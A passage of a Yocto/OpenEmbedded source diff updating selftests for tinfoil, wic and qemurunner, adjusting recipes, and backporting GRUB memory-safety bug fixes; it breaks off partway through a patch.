+ # The config_data API to parse_recipe_file is used by:
+ # layerindex-web layerindex/update_layer.py
+ def test_parse_recipe_custom_data(self):
+ with bb.tinfoil.Tinfoil() as tinfoil:
+ tinfoil.prepare(config_only=False, quiet=2)
+ localdata = bb.data.createCopy(tinfoil.config_data)
+ localdata.setVar("TESTVAR", "testval")
+ testrecipe = 'mdadm'
+ best = tinfoil.find_best_provider(testrecipe)
+ if not best:
+ self.fail('Unable to find recipe providing %s' % testrecipe)
+ rd = tinfoil.parse_recipe_file(best[3], config_data=localdata)
+ self.assertEqual("testval", rd.getVar('TESTVAR'))
+
def test_list_recipes(self):
with bb.tinfoil.Tinfoil() as tinfoil:
tinfoil.prepare(config_only=False, quiet=2)
@@ -87,36 +101,38 @@ class TinfoilTests(OESelftestTestCase):
with bb.tinfoil.Tinfoil() as tinfoil:
tinfoil.prepare(config_only=True)
- tinfoil.set_event_mask(['bb.event.FilesMatchingFound', 'bb.command.CommandCompleted'])
+ tinfoil.set_event_mask(['bb.event.FilesMatchingFound', 'bb.command.CommandCompleted', 'bb.command.CommandFailed', 'bb.command.CommandExit'])
# Need to drain events otherwise events that were masked may still be in the queue
while tinfoil.wait_event():
pass
pattern = 'conf'
- res = tinfoil.run_command('findFilesMatchingInDir', pattern, 'conf/machine')
+ res = tinfoil.run_command('testCookerCommandEvent', pattern, handle_events=False)
self.assertTrue(res)
eventreceived = False
commandcomplete = False
start = time.time()
- # Wait for 10s in total so we'd detect spurious heartbeat events for example
- # The test is IO load sensitive too
- while time.time() - start < 10:
+ # Wait for maximum 120s in total so we'd detect spurious heartbeat events for example
+ while (not (eventreceived == True and commandcomplete == True)
+ and (time.time() - start < 120)):
+ # if we received both events (on let's say a good day), we are done
event = tinfoil.wait_event(1)
if event:
if isinstance(event, bb.command.CommandCompleted):
commandcomplete = True
elif isinstance(event, bb.event.FilesMatchingFound):
self.assertEqual(pattern, event._pattern)
- self.assertIn('qemuarm.conf', event._matches)
+ self.assertIn('A', event._matches)
+ self.assertIn('B', event._matches)
eventreceived = True
elif isinstance(event, logging.LogRecord):
continue
else:
self.fail('Unexpected event: %s' % event)
- self.assertTrue(commandcomplete, 'Timed out waiting for CommandCompleted event from bitbake server')
+ self.assertTrue(commandcomplete, 'Timed out waiting for CommandCompleted event from bitbake server (Matching event received: %s)' % str(eventreceived))
self.assertTrue(eventreceived, 'Did not receive FilesMatchingFound event from bitbake server')
def test_setvariable_clean(self):
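(The new test_parse_recipe_custom_data case above boils down to the following usage sketch of the config_data argument to parse_recipe_file; the TESTVAR name and the mdadm recipe are only the illustrative values the test itself uses.)

    import bb.tinfoil, bb.data

    with bb.tinfoil.Tinfoil() as tinfoil:
        tinfoil.prepare(config_only=False, quiet=2)
        # Work on a private copy of the global datastore so settings made here
        # do not leak into the cooker's own configuration.
        localdata = bb.data.createCopy(tinfoil.config_data)
        localdata.setVar('TESTVAR', 'testval')
        best = tinfoil.find_best_provider('mdadm')   # best[3] is the recipe file path
        recipe_data = tinfoil.parse_recipe_file(best[3], config_data=localdata)
        print(recipe_data.getVar('PN'), recipe_data.getVar('TESTVAR'))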
diff --git a/meta/lib/oeqa/selftest/cases/wic.py b/meta/lib/oeqa/selftest/cases/wic.py
index 13b6a0cc72..f7abdba015 100644
--- a/meta/lib/oeqa/selftest/cases/wic.py
+++ b/meta/lib/oeqa/selftest/cases/wic.py
@@ -62,6 +62,12 @@ def extract_files(debugfs_output):
return [line.split('/')[5].strip() for line in \
debugfs_output.strip().split('/\n')]
+def files_own_by_root(debugfs_output):
+ for line in debugfs_output.strip().split('/\n'):
+ if line.split('/')[3:5] != ['0', '0']:
+ print(debugfs_output)
+ return False
+ return True
class WicTestCase(OESelftestTestCase):
"""Wic test class."""
@@ -84,6 +90,7 @@ class WicTestCase(OESelftestTestCase):
self.skipTest('wic-tools cannot be built due its (intltool|gettext)-native dependency and NLS disable')
bitbake('core-image-minimal')
+ bitbake('core-image-minimal-mtdutils')
WicTestCase.image_is_ready = True
rmtree(self.resultdir, ignore_errors=True)
@@ -506,6 +513,105 @@ part /part2 --source rootfs --ondisk mmcblk0 --fstype=ext4 --include-path %s"""
% (wks_file, self.resultdir), ignore_status=True).status)
os.remove(wks_file)
+ def test_permissions(self):
+ """Test permissions are respected"""
+
+ # prepare wicenv and rootfs
+ bitbake('core-image-minimal core-image-minimal-mtdutils -c do_rootfs_wicenv')
+
+ oldpath = os.environ['PATH']
+ os.environ['PATH'] = get_bb_var("PATH", "wic-tools")
+
+ t_normal = """
+part / --source rootfs --fstype=ext4
+"""
+ t_exclude = """
+part / --source rootfs --fstype=ext4 --exclude-path=home
+"""
+ t_multi = """
+part / --source rootfs --ondisk sda --fstype=ext4
+part /export --source rootfs --rootfs=core-image-minimal-mtdutils --fstype=ext4
+"""
+ t_change = """
+part / --source rootfs --ondisk sda --fstype=ext4 --exclude-path=etc/
+part /etc --source rootfs --fstype=ext4 --change-directory=etc
+"""
+ tests = [t_normal, t_exclude, t_multi, t_change]
+
+ try:
+ for test in tests:
+ include_path = os.path.join(self.resultdir, 'test-include')
+ os.makedirs(include_path)
+ wks_file = os.path.join(include_path, 'temp.wks')
+ with open(wks_file, 'w') as wks:
+ wks.write(test)
+ runCmd("wic create %s -e core-image-minimal -o %s" \
+ % (wks_file, self.resultdir))
+
+ for part in glob(os.path.join(self.resultdir, 'temp-*.direct.p*')):
+ res = runCmd("debugfs -R 'ls -p' %s 2>/dev/null" % (part))
+ self.assertEqual(True, files_own_by_root(res.output))
+
+ config = 'IMAGE_FSTYPES += "wic"\nWKS_FILE = "%s"\n' % wks_file
+ self.append_config(config)
+ bitbake('core-image-minimal')
+ tmpdir = os.path.join(get_bb_var('WORKDIR', 'core-image-minimal'),'build-wic')
+
+ # check each partition for permission
+ for part in glob(os.path.join(tmpdir, 'temp-*.direct.p*')):
+ res = runCmd("debugfs -R 'ls -p' %s 2>/dev/null" % (part))
+ self.assertTrue(files_own_by_root(res.output)
+ ,msg='Files permission incorrect using wks set "%s"' % test)
+
+ # clean config and result directory for next cases
+ self.remove_config(config)
+ rmtree(self.resultdir, ignore_errors=True)
+
+ finally:
+ os.environ['PATH'] = oldpath
+
+ def test_change_directory(self):
+ """Test --change-directory wks option."""
+
+ oldpath = os.environ['PATH']
+ os.environ['PATH'] = get_bb_var("PATH", "wic-tools")
+
+ try:
+ include_path = os.path.join(self.resultdir, 'test-include')
+ os.makedirs(include_path)
+ wks_file = os.path.join(include_path, 'temp.wks')
+ with open(wks_file, 'w') as wks:
+ wks.write("part /etc --source rootfs --fstype=ext4 --change-directory=etc")
+ runCmd("wic create %s -e core-image-minimal -o %s" \
+ % (wks_file, self.resultdir))
+
+ part1 = glob(os.path.join(self.resultdir, 'temp-*.direct.p1'))[0]
+
+ res = runCmd("debugfs -R 'ls -p' %s 2>/dev/null" % (part1))
+ files = extract_files(res.output)
+ self.assertIn('passwd', files)
+
+ finally:
+ os.environ['PATH'] = oldpath
+
+ def test_change_directory_errors(self):
+ """Test --change-directory wks option error handling."""
+ wks_file = 'temp.wks'
+
+ # Absolute argument.
+ with open(wks_file, 'w') as wks:
+ wks.write("part / --source rootfs --fstype=ext4 --change-directory /usr")
+ self.assertNotEqual(0, runCmd("wic create %s -e core-image-minimal -o %s" \
+ % (wks_file, self.resultdir), ignore_status=True).status)
+ os.remove(wks_file)
+
+ # Argument pointing to parent directory.
+ with open(wks_file, 'w') as wks:
+ wks.write("part / --source rootfs --fstype=ext4 --change-directory ././..")
+ self.assertNotEqual(0, runCmd("wic create %s -e core-image-minimal -o %s" \
+ % (wks_file, self.resultdir), ignore_status=True).status)
+ os.remove(wks_file)
+
class Wic2(WicTestCase):
def test_bmap_short(self):
@@ -799,14 +905,18 @@ class Wic2(WicTestCase):
@only_for_arch(['i586', 'i686', 'x86_64'])
def test_rawcopy_plugin_qemu(self):
"""Test rawcopy plugin in qemu"""
- # build ext4 and wic images
- for fstype in ("ext4", "wic"):
- config = 'IMAGE_FSTYPES = "%s"\nWKS_FILE = "test_rawcopy_plugin.wks.in"\n' % fstype
- self.append_config(config)
- self.assertEqual(0, bitbake('core-image-minimal').status)
- self.remove_config(config)
+ # build ext4 and then use it for a wic image
+ config = 'IMAGE_FSTYPES = "ext4"\n'
+ self.append_config(config)
+ self.assertEqual(0, bitbake('core-image-minimal').status)
+ self.remove_config(config)
- with runqemu('core-image-minimal', ssh=False, image_fstype='wic') as qemu:
+ config = 'IMAGE_FSTYPES = "wic"\nWKS_FILE = "test_rawcopy_plugin.wks.in"\n'
+ self.append_config(config)
+ self.assertEqual(0, bitbake('core-image-minimal-mtdutils').status)
+ self.remove_config(config)
+
+ with runqemu('core-image-minimal-mtdutils', ssh=False, image_fstype='wic') as qemu:
cmd = "grep sda. /proc/partitions |wc -l"
status, output = qemu.run_serial(cmd)
self.assertEqual(1, status, 'Failed to run command "%s": %s' % (cmd, output))
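(A note on the ownership check used by the new wic permission tests: debugfs -R 'ls -p' prints one slash-separated record per directory entry, roughly /<inode>/<mode>/<uid>/<gid>/<name>/<size>/, so files_own_by_root() only has to confirm that fields 3 and 4 are both '0'. A standalone sketch, using made-up sample output:)

    sample = "/2/040755/0/0/bin/1024/\n/12/100644/1000/1000/stray-file/42/"
    for record in sample.strip().split('/\n'):
        fields = record.split('/')
        owned_by_root = fields[3:5] == ['0', '0']
        print(fields[5], 'root' if owned_by_root else '%s:%s' % (fields[3], fields[4]))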
diff --git a/meta/lib/oeqa/selftest/context.py b/meta/lib/oeqa/selftest/context.py
index 33557b1240..be3ec6401f 100644
--- a/meta/lib/oeqa/selftest/context.py
+++ b/meta/lib/oeqa/selftest/context.py
@@ -34,7 +34,7 @@ class NonConcurrentTestSuite(unittest.TestSuite):
(builddir, newbuilddir) = self.setupfunc("-st", None, self.suite)
ret = super().run(result)
os.chdir(builddir)
- if newbuilddir and ret.wasSuccessful():
+ if newbuilddir and ret.wasSuccessful() and self.removefunc:
self.removefunc(newbuilddir)
def removebuilddir(d):
@@ -54,7 +54,7 @@ def removebuilddir(d):
bb.utils.prunedir(d, ionice=True)
class OESelftestTestContext(OETestContext):
- def __init__(self, td=None, logger=None, machines=None, config_paths=None, newbuilddir=None):
+ def __init__(self, td=None, logger=None, machines=None, config_paths=None, newbuilddir=None, keep_builddir=None):
super(OESelftestTestContext, self).__init__(td, logger)
self.machines = machines
@@ -62,6 +62,11 @@ class OESelftestTestContext(OETestContext):
self.config_paths = config_paths
self.newbuilddir = newbuilddir
+ if keep_builddir:
+ self.removebuilddir = None
+ else:
+ self.removebuilddir = removebuilddir
+
def setup_builddir(self, suffix, selftestdir, suite):
builddir = os.environ['BUILDDIR']
if not selftestdir:
@@ -119,9 +124,9 @@ class OESelftestTestContext(OETestContext):
if processes:
from oeqa.core.utils.concurrencytest import ConcurrentTestSuite
- return ConcurrentTestSuite(suites, processes, self.setup_builddir, removebuilddir)
+ return ConcurrentTestSuite(suites, processes, self.setup_builddir, self.removebuilddir)
else:
- return NonConcurrentTestSuite(suites, processes, self.setup_builddir, removebuilddir)
+ return NonConcurrentTestSuite(suites, processes, self.setup_builddir, self.removebuilddir)
def runTests(self, processes=None, machine=None, skips=[]):
if machine:
@@ -179,6 +184,9 @@ class OESelftestTestContextExecutor(OETestContextExecutor):
action='append', default=None,
help='Exclude all (unhidden) tests that match any of the specified tag(s). (exclude applies before select)')
+ parser.add_argument('-K', '--keep-builddir', action='store_true',
+ help='Keep the test build directory even if all tests pass')
+
parser.add_argument('-B', '--newbuilddir', help='New build directory to use for tests.')
parser.set_defaults(func=self.run)
@@ -235,6 +243,7 @@ class OESelftestTestContextExecutor(OETestContextExecutor):
self.tc_kwargs['init']['config_paths']['localconf'] = os.path.join(builddir, "conf/local.conf")
self.tc_kwargs['init']['config_paths']['bblayers'] = os.path.join(builddir, "conf/bblayers.conf")
self.tc_kwargs['init']['newbuilddir'] = args.newbuilddir
+ self.tc_kwargs['init']['keep_builddir'] = args.keep_builddir
def tag_filter(tags):
if args.exclude_tags:
diff --git a/meta/lib/oeqa/utils/buildproject.py b/meta/lib/oeqa/utils/buildproject.py
index e6d80cc8dc..dfb9661868 100644
--- a/meta/lib/oeqa/utils/buildproject.py
+++ b/meta/lib/oeqa/utils/buildproject.py
@@ -18,6 +18,7 @@ class BuildProject(metaclass=ABCMeta):
def __init__(self, uri, foldername=None, tmpdir=None, dl_dir=None):
self.uri = uri
self.archive = os.path.basename(uri)
+ self.tempdirobj = None
if not tmpdir:
self.tempdirobj = tempfile.TemporaryDirectory(prefix='buildproject-')
tmpdir = self.tempdirobj.name
@@ -57,6 +58,8 @@ class BuildProject(metaclass=ABCMeta):
return self._run('cd %s; make install %s' % (self.targetdir, install_args))
def clean(self):
+ if self.tempdirobj:
+ self.tempdirobj.cleanup()
if not self.needclean:
return
self._run('rm -rf %s' % self.targetdir)
diff --git a/meta/lib/oeqa/utils/commands.py b/meta/lib/oeqa/utils/commands.py
index 8059cbce3e..024261410e 100644
--- a/meta/lib/oeqa/utils/commands.py
+++ b/meta/lib/oeqa/utils/commands.py
@@ -125,11 +125,11 @@ class Command(object):
def stop(self):
for thread in self.threads:
- if thread.isAlive():
+ if thread.is_alive():
self.process.terminate()
# let's give it more time to terminate gracefully before killing it
thread.join(5)
- if thread.isAlive():
+ if thread.is_alive():
self.process.kill()
thread.join()
@@ -174,11 +174,8 @@ def runCmd(command, ignore_status=False, timeout=None, assert_error=True, sync=T
if native_sysroot:
extra_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin" % \
(native_sysroot, native_sysroot, native_sysroot)
- extra_libpaths = "%s/lib:%s/usr/lib" % \
- (native_sysroot, native_sysroot)
nenv = dict(options.get('env', os.environ))
nenv['PATH'] = extra_paths + ':' + nenv.get('PATH', '')
- nenv['LD_LIBRARY_PATH'] = extra_libpaths + ':' + nenv.get('LD_LIBRARY_PATH', '')
options['env'] = nenv
cmd = Command(command, timeout=timeout, output_log=output_log, **options)
@@ -188,7 +185,10 @@ def runCmd(command, ignore_status=False, timeout=None, assert_error=True, sync=T
# call sync around the tests to ensure the IO queue doesn't get too large, taking any IO
# hit here rather than in bitbake shutdown.
if sync:
+ p = os.environ['PATH']
+ os.environ['PATH'] = "/usr/bin:/bin:/usr/sbin:/sbin:" + p
os.system("sync")
+ os.environ['PATH'] = p
result.command = command
result.status = cmd.status
diff --git a/meta/lib/oeqa/utils/metadata.py b/meta/lib/oeqa/utils/metadata.py
index 8013aa684d..15ec190c4a 100644
--- a/meta/lib/oeqa/utils/metadata.py
+++ b/meta/lib/oeqa/utils/metadata.py
@@ -27,9 +27,9 @@ def metadata_from_bb():
data_dict = get_bb_vars()
# Distro information
- info_dict['distro'] = {'id': data_dict['DISTRO'],
- 'version_id': data_dict['DISTRO_VERSION'],
- 'pretty_name': '%s %s' % (data_dict['DISTRO'], data_dict['DISTRO_VERSION'])}
+ info_dict['distro'] = {'id': data_dict.get('DISTRO', 'NODISTRO'),
+ 'version_id': data_dict.get('DISTRO_VERSION', 'NO_DISTRO_VERSION'),
+ 'pretty_name': '%s %s' % (data_dict.get('DISTRO', 'NODISTRO'), data_dict.get('DISTRO_VERSION', 'NO_DISTRO_VERSION'))}
# Host distro information
os_release = get_os_release()
diff --git a/meta/lib/oeqa/utils/nfs.py b/meta/lib/oeqa/utils/nfs.py
index a37686c914..c9bac050a4 100644
--- a/meta/lib/oeqa/utils/nfs.py
+++ b/meta/lib/oeqa/utils/nfs.py
@@ -8,7 +8,7 @@ from oeqa.utils.commands import bitbake, get_bb_var, Command
from oeqa.utils.network import get_free_port
@contextlib.contextmanager
-def unfs_server(directory, logger = None):
+def unfs_server(directory, logger = None, udp = True):
unfs_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "unfs3-native")
if not os.path.exists(os.path.join(unfs_sysroot, "usr", "bin", "unfsd")):
# build native tool
@@ -22,7 +22,7 @@ def unfs_server(directory, logger = None):
exports.write("{0} (rw,no_root_squash,no_all_squash,insecure)\n".format(directory).encode())
# find some ports for the server
- nfsport, mountport = get_free_port(udp = True), get_free_port(udp = True)
+ nfsport, mountport = get_free_port(udp), get_free_port(udp)
nenv = dict(os.environ)
nenv['PATH'] = "{0}/sbin:{0}/usr/sbin:{0}/usr/bin:".format(unfs_sysroot) + nenv.get('PATH', '')
diff --git a/meta/lib/oeqa/utils/qemurunner.py b/meta/lib/oeqa/utils/qemurunner.py
index 77ec939ad7..c84d299a80 100644
--- a/meta/lib/oeqa/utils/qemurunner.py
+++ b/meta/lib/oeqa/utils/qemurunner.py
@@ -70,6 +70,8 @@ class QemuRunner:
self.monitorpipe = None
self.logger = logger
+ # Whether we're expecting an exit and should show related errors
+ self.canexit = False
# Enable testing other OS's
# Set commands for target communication, and default to Linux ALWAYS
@@ -118,7 +120,10 @@ class QemuRunner:
import fcntl
fl = fcntl.fcntl(o, fcntl.F_GETFL)
fcntl.fcntl(o, fcntl.F_SETFL, fl | os.O_NONBLOCK)
- return os.read(o.fileno(), 1000000).decode("utf-8")
+ try:
+ return os.read(o.fileno(), 1000000).decode("utf-8")
+ except BlockingIOError:
+ return ""
def handleSIGCHLD(self, signum, frame):
@@ -229,7 +234,7 @@ class QemuRunner:
r = os.fdopen(r)
x = r.read()
os.killpg(os.getpgid(self.runqemu.pid), signal.SIGTERM)
- sys.exit(0)
+ os._exit(0)
self.logger.debug("runqemu started, pid is %s" % self.runqemu.pid)
self.logger.debug("waiting at most %s seconds for qemu pid (%s)" %
@@ -427,12 +432,17 @@ class QemuRunner:
except OSError as e:
if e.errno != errno.ESRCH:
raise
- endtime = time.time() + self.runqemutime
- while self.runqemu.poll() is None and time.time() < endtime:
- time.sleep(1)
- if self.runqemu.poll() is None:
+ try:
+ outs, errs = self.runqemu.communicate(timeout = self.runqemutime)
+ if outs:
+ self.logger.info("Output from runqemu:\n%s", outs.decode("utf-8"))
+ if errs:
+ self.logger.info("Stderr from runqemu:\n%s", errs.decode("utf-8"))
+ except TimeoutExpired:
self.logger.debug("Sending SIGKILL to runqemu")
os.killpg(os.getpgid(self.runqemu.pid), signal.SIGKILL)
+ if not self.runqemu.stdout.closed:
+ self.logger.info("Output from runqemu:\n%s" % self.getOutput(self.runqemu.stdout))
self.runqemu.stdin.close()
self.runqemu.stdout.close()
self.runqemu_exited = True
@@ -467,6 +477,11 @@ class QemuRunner:
self.thread.stop()
self.thread.join()
+ def allowexit(self):
+ self.canexit = True
+ if self.thread:
+ self.thread.allowexit()
+
def restart(self, qemuparams = None):
self.logger.warning("Restarting qemu process")
if self.runqemu.poll() is None:
@@ -522,7 +537,9 @@ class QemuRunner:
if re.search(self.boot_patterns['search_cmd_finished'], data):
break
else:
- raise Exception("No data on serial console socket")
+ if self.canexit:
+ return (1, "")
+ raise Exception("No data on serial console socket, connection closed?")
if data:
if raw:
@@ -560,6 +577,7 @@ class LoggingThread(threading.Thread):
self.logger = logger
self.readsock = None
self.running = False
+ self.canexit = False
self.errorevents = select.POLLERR | select.POLLHUP | select.POLLNVAL
self.readevents = select.POLLIN | select.POLLPRI
@@ -593,6 +611,9 @@ class LoggingThread(threading.Thread):
self.close_ignore_error(self.writepipe)
self.running = False
+ def allowexit(self):
+ self.canexit = True
+
def eventloop(self):
poll = select.poll()
event_read_mask = self.errorevents | self.readevents
@@ -638,7 +659,7 @@ class LoggingThread(threading.Thread):
data = self.readsock.recv(count)
except socket.error as e:
if e.errno == errno.EAGAIN or e.errno == errno.EWOULDBLOCK:
- return ''
+ return b''
else:
raise
@@ -649,7 +670,9 @@ class LoggingThread(threading.Thread):
# happened. But for this code it counts as an
# error since the connection shouldn't go away
# until qemu exits.
- raise Exception("Console connection closed unexpectedly")
+ if not self.canexit:
+ raise Exception("Console connection closed unexpectedly")
+ return b''
return data
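(The qemurunner changes above combine two small patterns: a non-blocking pipe read that tolerates an empty pipe, and a canexit/allowexit flag that turns a closed console connection from an error into an expected event. The read pattern in isolation, as a sketch where 'pipe' stands in for the runqemu output stream:)

    import fcntl, os

    def read_nonblocking(pipe):
        # Switch the fd to non-blocking mode, then treat "no data yet"
        # (BlockingIOError) as an empty read instead of a crash.
        fl = fcntl.fcntl(pipe, fcntl.F_GETFL)
        fcntl.fcntl(pipe, fcntl.F_SETFL, fl | os.O_NONBLOCK)
        try:
            return os.read(pipe.fileno(), 1000000).decode("utf-8")
        except BlockingIOError:
            return ""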
diff --git a/meta/lib/oeqa/utils/targetbuild.py b/meta/lib/oeqa/utils/targetbuild.py
index 1055810ca3..09738add1d 100644
--- a/meta/lib/oeqa/utils/targetbuild.py
+++ b/meta/lib/oeqa/utils/targetbuild.py
@@ -19,6 +19,7 @@ class BuildProject(metaclass=ABCMeta):
self.d = d
self.uri = uri
self.archive = os.path.basename(uri)
+ self.tempdirobj = None
if not tmpdir:
tmpdir = self.d.getVar('WORKDIR')
if not tmpdir:
@@ -71,9 +72,10 @@ class BuildProject(metaclass=ABCMeta):
return self._run('cd %s; make install %s' % (self.targetdir, install_args))
def clean(self):
+ if self.tempdirobj:
+ self.tempdirobj.cleanup()
self._run('rm -rf %s' % self.targetdir)
subprocess.check_call('rm -f %s' % self.localarchive, shell=True)
- pass
class TargetBuildProject(BuildProject):
diff --git a/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb b/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
index 5d6f200a73..e9dfa0770e 100644
--- a/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
+++ b/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
@@ -10,7 +10,7 @@ DEPENDS = "efivar popt"
COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux"
-SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https \
+SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https;branch=master \
file://0001-remove-extra-decl.patch \
file://97668ae0bce776a36ea2001dea63d376be8274ac.patch \
"
diff --git a/meta/recipes-bsp/efivar/efivar/determinism.patch b/meta/recipes-bsp/efivar/efivar/determinism.patch
new file mode 100644
index 0000000000..bdf6bfc4a8
--- /dev/null
+++ b/meta/recipes-bsp/efivar/efivar/determinism.patch
@@ -0,0 +1,18 @@
+Fix reproducibility issue caused by unsorted wildcard expansion.
+
+Upstream-Status: Pending
+RP 2021/3/1
+
+Index: git/src/Makefile
+===================================================================
+--- git.orig/src/Makefile
++++ git/src/Makefile
+@@ -15,7 +15,7 @@ TARGETS=$(LIBTARGETS) $(BINTARGETS) $(PC
+ STATICTARGETS=$(STATICLIBTARGETS) $(STATICBINTARGETS)
+
+ LIBEFIBOOT_SOURCES = crc32.c creator.c disk.c gpt.c loadopt.c path-helpers.c \
+- linux.c $(wildcard linux-*.c)
++ linux.c $(sort $(wildcard linux-*.c))
+ LIBEFIBOOT_OBJECTS = $(patsubst %.c,%.o,$(LIBEFIBOOT_SOURCES))
+ LIBEFIVAR_SOURCES = dp.c dp-acpi.c dp-hw.c dp-media.c dp-message.c \
+ efivarfs.c error.c export.c guid.c guids.S guid-symbols.c \
diff --git a/meta/recipes-bsp/efivar/efivar_37.bb b/meta/recipes-bsp/efivar/efivar_37.bb
index 9b95721a4e..858c61ae6a 100644
--- a/meta/recipes-bsp/efivar/efivar_37.bb
+++ b/meta/recipes-bsp/efivar/efivar_37.bb
@@ -7,7 +7,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=6626bb1e20189cfa95f2c508ba286393"
COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux"
-SRC_URI = "git://github.com/rhinstaller/efivar.git \
+SRC_URI = "git://github.com/rhinstaller/efivar.git;branch=main;protocol=https \
+ file://determinism.patch \
file://no-werror.patch"
SRCREV = "c1d6b10e1ed4ba2be07f385eae5bceb694478a10"
diff --git a/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb b/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
index 9954d7f57a..191b0bc176 100644
--- a/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
+++ b/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
@@ -1,5 +1,6 @@
SUMMARY = "Libraries for producing EFI binaries"
HOMEPAGE = "http://sourceforge.net/projects/gnu-efi/"
+DESCRIPTION = "GNU-EFI aims to Develop EFI applications for ARM-64, ARM-32, x86_64, IA-64 (IPF), IA-32 (x86), and MIPS platforms using the GNU toolchain and the EFI development environment."
SECTION = "devel"
LICENSE = "GPLv2+ | BSD-2-Clause"
LIC_FILES_CHKSUM = "file://gnuefi/crt0-efi-arm.S;beginline=4;endline=16;md5=e582764a4776e60c95bf9ab617343d36 \
diff --git a/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch b/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch
new file mode 100644
index 0000000000..eaaa7effae
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch
@@ -0,0 +1,39 @@
+From 0900f11def2e7fbb4880efff0cd9c9b32f1cdb86 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 3 Dec 2020 14:39:45 +0000
+Subject: [PATCH] mmap: Fix memory leak when iterating over mapped memory
+
+When returning from grub_mmap_iterate() the memory allocated to present
+is not being released causing it to leak.
+
+Fixes: CID 96655
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8cb2848f9699642a698af84b12ba187cab722031]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/mmap/mmap.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c
+index 7ebf32e..8bf235f 100644
+--- a/grub-core/mmap/mmap.c
++++ b/grub-core/mmap/mmap.c
+@@ -270,6 +270,7 @@ grub_mmap_iterate (grub_memory_hook_t hook, void *hook_data)
+ hook_data))
+ {
+ grub_free (ctx.scanline_events);
++ grub_free (present);
+ return GRUB_ERR_NONE;
+ }
+
+@@ -282,6 +283,7 @@ grub_mmap_iterate (grub_memory_hook_t hook, void *hook_data)
+ }
+
+ grub_free (ctx.scanline_events);
++ grub_free (present);
+ return GRUB_ERR_NONE;
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch b/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch
new file mode 100644
index 0000000000..d00821f5c3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch
@@ -0,0 +1,39 @@
+From f216a75e884ed5e4e94bf86965000dde51148f94 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 27 Nov 2020 15:10:26 +0000
+Subject: [PATCH] net/net: Fix possible dereference to of a NULL pointer
+
+It is always possible that grub_zalloc() could fail, so we should check for
+a NULL return. Otherwise we run the risk of dereferencing a NULL pointer.
+
+Fixes: CID 296221
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=03f2515ae0c503406f1a99a2178405049c6555db]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/net/net.c | 9 +++++++--
+ 1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/net/net.c b/grub-core/net/net.c
+index 38f19df..7c2cdf2 100644
+--- a/grub-core/net/net.c
++++ b/grub-core/net/net.c
+@@ -86,8 +86,13 @@ grub_net_link_layer_add_address (struct grub_net_card *card,
+
+ /* Add sender to cache table. */
+ if (card->link_layer_table == NULL)
+- card->link_layer_table = grub_zalloc (LINK_LAYER_CACHE_SIZE
+- * sizeof (card->link_layer_table[0]));
++ {
++ card->link_layer_table = grub_zalloc (LINK_LAYER_CACHE_SIZE
++ * sizeof (card->link_layer_table[0]));
++ if (card->link_layer_table == NULL)
++ return;
++ }
++
+ entry = &(card->link_layer_table[card->new_ll_entry]);
+ entry->avail = 1;
+ grub_memcpy (&entry->ll_address, ll, sizeof (entry->ll_address));
diff --git a/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch b/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch
new file mode 100644
index 0000000000..3b4633507d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0003-net-tftp-Fix-dangling-memory-pointer.patch
@@ -0,0 +1,33 @@
+From 09cc0df477758b60f51fbc0da1dee2f5d54c333d Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 19 Feb 2021 17:12:23 +0000
+Subject: [PATCH] net/tftp: Fix dangling memory pointer
+
+The static code analysis tool, Parfait, reported that the value of
+file->data was left referencing memory that was freed by the call to
+grub_free(data) where data was initialized from file->data.
+
+To ensure that there is no unintentional access to this memory
+referenced by file->data we should set the pointer to NULL.
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=0cb838b281a68b536a09681f9557ea6a7ac5da7a]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/net/tftp.c | 1 +
